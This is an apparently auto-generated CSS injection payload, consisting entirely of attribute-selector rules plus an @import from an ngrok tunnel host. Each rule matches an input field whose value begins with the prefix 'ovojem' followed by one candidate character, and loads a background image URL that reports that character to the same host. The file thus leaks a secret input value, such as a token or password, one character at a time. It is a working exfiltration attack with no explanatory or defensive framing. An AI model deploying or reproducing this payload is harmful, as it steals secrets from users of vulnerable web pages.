@import url("http://bc0a37bcf1d5.ngrok.io/?l=8");
input[value="ovojem!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.6690703924142123");}
input[value="ovojem\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.05455027783496669");}
input[value="ovojem#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.8791017729098358");}
input[value="ovojem$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.4156932427495754");}
input[value="ovojem%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.7442745201551992");}
input[value="ovojem&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.4208984276447538");}
input[value="ovojem'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.47490408297347075");}
input[value="ovojem("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.7368580321452303");}
input[value="ovojem)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.8644403705965986");}
input[value="ovojem*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.7101343149976043");}
input[value="ovojem+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.7997099091517057");}
input[value="ovojem,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.63811975183076");}
input[value="ovojem-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.31608134476364214");}
input[value="ovojem."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.5494708879742558");}
input[value="ovojem/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.5628582611083284");}
input[value="ovojem0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.4471790119599075");}
input[value="ovojem1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.2814809793964761");}
input[value="ovojem2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.33535247801842805");}
input[value="ovojem3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.4265608924232154");}
input[value="ovojem4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.23839641791718558");}
input[value="ovojem5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.36200659677295954");}
input[value="ovojem6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.02334503277112754");}
input[value="ovojem7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.9168543495250399");}
input[value="ovojem8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.3330646062176268");}
input[value="ovojem9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.5809100826391898");}
input[value="ovojem:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.8874067518343693");}
input[value="ovojem;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.29966006110122745");}
input[value="ovojem<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.9647119561707906");}
input[value="ovojem="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.09425650800375007");}
input[value="ovojem>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.2431799286366989");}
input[value="ovojem?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.7971033053983714");}
input[value="ovojem@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.958209649216119");}
input[value="ovojemA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.18066346456511595");}
input[value="ovojemB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.897385822140969");}
input[value="ovojemC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.8340569914289873");}
input[value="ovojemD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.12621941524080826");}
input[value="ovojemE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.5579635808211063");}
input[value="ovojemF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.0021961410580422225");}
input[value="ovojemG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.7613331893078319");}
input[value="ovojemH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.16877181169272348");}
input[value="ovojemI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.8482712135982231");}
input[value="ovojemJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.32019825344268904");}
input[value="ovojemK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.3339141739553704");}
input[value="ovojemL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.3702046394722136");}
input[value="ovojemM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.5161727431047887");}
input[value="ovojemN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.5596358255631186");}
input[value="ovojemO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.4570810143733268");}
input[value="ovojemP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.6054634205971718");}
input[value="ovojemQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.799384477731051");}
input[value="ovojemR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.4221442009695695");}
input[value="ovojemS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.3441663043899361");}
input[value="ovojemT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.46395795415284424");}
input[value="ovojemU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.3005615205530616");}
input[value="ovojemV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.4264555972876045");}
input[value="ovojemW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.904871737211181");}
input[value="ovojemX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.8245033456378814");}
input[value="ovojemY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.22421225251656152");}
input[value="ovojemZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.047786812864627715");}
input[value="ovojem["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.5277943925416815");}
input[value="ovojem\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.9411385892819013");}
input[value="ovojem]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.7401609875997042");}
input[value="ovojem^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.9132140700106055");}
input[value="ovojem_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.43408021320073953");}
input[value="ovojem`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.5459079802514688");}
input[value="ovojema"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.5036340452915682");}
input[value="ovojemb"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.8498066790554744");}
input[value="ovojemc"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.07355072650157068");}
input[value="ovojemd"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.44274260571353596");}
input[value="ovojeme"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.43786785756908353");}
input[value="ovojemf"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.580135751842479");}
input[value="ovojemg"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.654412686957609");}
input[value="ovojemh"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.8923001066203491");}
input[value="ovojemi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.7824751665887484");}
input[value="ovojemj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.824921614497931");}
input[value="ovojemk"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.7020445958692998");}
input[value="ovojeml"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.10037222214960417");}
input[value="ovojemm"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.37086343751238693");}
input[value="ovojemn"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.41305268949582397");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.7766063689996627");}
input[value="ovojemp"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.9138532203740208");}
input[value="ovojemq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.1463469314608008");}
input[value="ovojemr"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.9139720863837577");}
input[value="ovojems"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.8062034782118244");}
input[value="ovojemt"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.9237587407734165");}
input[value="ovojemu"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.6908574803340122");}
input[value="ovojemv"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.48942683659322306");}
input[value="ovojemw"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.7714604157941927");}
input[value="ovojemx"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.6244555831763641");}
input[value="ovojemy"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.7540095849912645");}
input[value="ovojemz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.1625673697597596");}
input[value="ovojem{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.3812075803846242");}
input[value="ovojem|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.23937129537309354");}
input[value="ovojem}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.7003100692406401");}
input[value="ovojem~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.8008964474955338");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6086844767781538");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.17129067988572078");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2676971867717419");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5585754450930145");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.42313016794194036");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8542501940012626");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.21141049908079257");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6783175845023048");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5772746841238259");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9825583755170291");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.011832189308691898");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.954408776418243");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3812760954585457");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.0760898158277945");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7584613342853945");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.09257770727517478");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.08179500861212463");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9223772363116933");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7558300753108411");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.33120876508063124");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4577695266129256");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4195397918172856");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6876189992479067");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5692055630906667");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6549450548579345");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8299572772957418");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.03829692010314911");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9688518366818186");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2670510517188245");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.13213498232450394");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3375901604091125");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.1257774673069676");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9762670220645042");}
input[value="ovojem "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.7661562198243512");}
input[value="ovojem¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.33812684366024404");}
input[value="ovojem¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.614132051763405");}
input[value="ovojem£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.6118886275496209");}
input[value="ovojem¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.06992281047768234");}
input[value="ovojem¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.3342141053692418");}
input[value="ovojem¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.9251765783500188");}
input[value="ovojem§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.8193853815378453");}
input[value="ovojem¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.8787108666819048");}
input[value="ovojem©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.709006678629051");}
input[value="ovojemª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.2843581970921558");}
input[value="ovojem«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.9532905391502537");}
input[value="ovojem¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.1898547977186158");}
input[value="ovojem­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.11793489653271116");}
input[value="ovojem®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.5467903731236665");}
input[value="ovojem¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.45406674628379085");}
input[value="ovojem°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.1498667889842058");}
input[value="ovojem±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.4737248155897058");}
input[value="ovojem²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.27402903904744425");}
input[value="ovojem³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.3063717515670483");}
input[value="ovojem´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.5922509836212704");}
input[value="ovojemµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.8851150406885049");}
input[value="ovojem¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.8993243402637361");}
input[value="ovojem·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.8203846289333303");}
input[value="ovojem¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.40905862750381483");}
input[value="ovojem¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.1140199464986349");}
input[value="ovojemº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.5475091209596146");}
input[value="ovojem»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.8985011468783999");}
input[value="ovojem¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.5313967848985592");}
input[value="ovojem½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.4080400790822514");}
input[value="ovojem¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.07820189799148869");}
input[value="ovojem¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.9191345897827359");}
input[value="ovojemÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.6535749221870144");}
input[value="ovojemÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.8318681840462212");}
input[value="ovojemÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.07055709321928516");}
input[value="ovojemÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.07607619255692644");}
input[value="ovojemÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.001307131690144292");}
input[value="ovojemÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.15432867416673557");}
input[value="ovojemÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.8203826876882736");}
input[value="ovojemÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.7361736371073402");}
input[value="ovojemÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.5644216408941027");}
input[value="ovojemÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.5449841236563786");}
input[value="ovojemÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.49003595128896715");}
input[value="ovojemË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.5354737750050451");}
input[value="ovojemÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.10267377225322316");}
input[value="ovojemÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.636846281058131");}
input[value="ovojemÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.634178507312664");}
input[value="ovojemÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.3738091433737889");}
input[value="ovojemÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.6868729664063515");}
input[value="ovojemÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.9729691538671361");}
input[value="ovojemÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.11281765510322295");}
input[value="ovojemÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.6542711849293792");}
input[value="ovojemÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.427164420590989");}
input[value="ovojemÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.6099477810043015");}
input[value="ovojemÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.7002759550551352");}
input[value="ovojem×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.4842482341051044");}
input[value="ovojemØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.13314480619529845");}
input[value="ovojemÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.3250188333891326");}
input[value="ovojemÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.052707795306501604");}
input[value="ovojemÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.39856866295786175");}
input[value="ovojemÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.7013785173034572");}
input[value="ovojemÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.060535925355117204");}
input[value="ovojemÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.8357313308759726");}
input[value="ovojemß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.5030320707772162");}
input[value="ovojemà"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.43960478770640643");}
input[value="ovojemá"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.8673365338959749");}
input[value="ovojemâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.4998502962754441");}
input[value="ovojemã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.6150141969076341");}
input[value="ovojemä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.6524929368465744");}
input[value="ovojemå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.8583997414251738");}
input[value="ovojemæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.6228790791404377");}
input[value="ovojemç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.0807519481032295");}
input[value="ovojemè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.5444852379635596");}
input[value="ovojemé"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.7827521925944145");}
input[value="ovojemê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.03256728536633324");}
input[value="ovojemë"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.40991698508353824");}
input[value="ovojemì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.9172727493334343");}
input[value="ovojemí"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.4644569282325577");}
input[value="ovojemî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.939192610579958");}
input[value="ovojemï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.30230975722529907");}
input[value="ovojemð"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.15963951361139905");}
input[value="ovojemñ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.6902243051072776");}
input[value="ovojemò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.6563686552164127");}
input[value="ovojemó"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.4854082477327637");}
input[value="ovojemô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.3938122307523555");}
input[value="ovojemõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.2991750706604255");}
input[value="ovojemö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.21109821603733092");}
input[value="ovojem÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.25557819926772063");}
input[value="ovojemø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.6029101539013275");}
input[value="ovojemù"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.27566016518426184");}
input[value="ovojemú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.8304864998194688");}
input[value="ovojemû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.5892937989129752");}
input[value="ovojemü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.7874161190644398");}
input[value="ovojemý"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.9422810349133046");}
input[value="ovojemþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.610082794656944");}
input[value="ovojemÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.5679097035000826");}
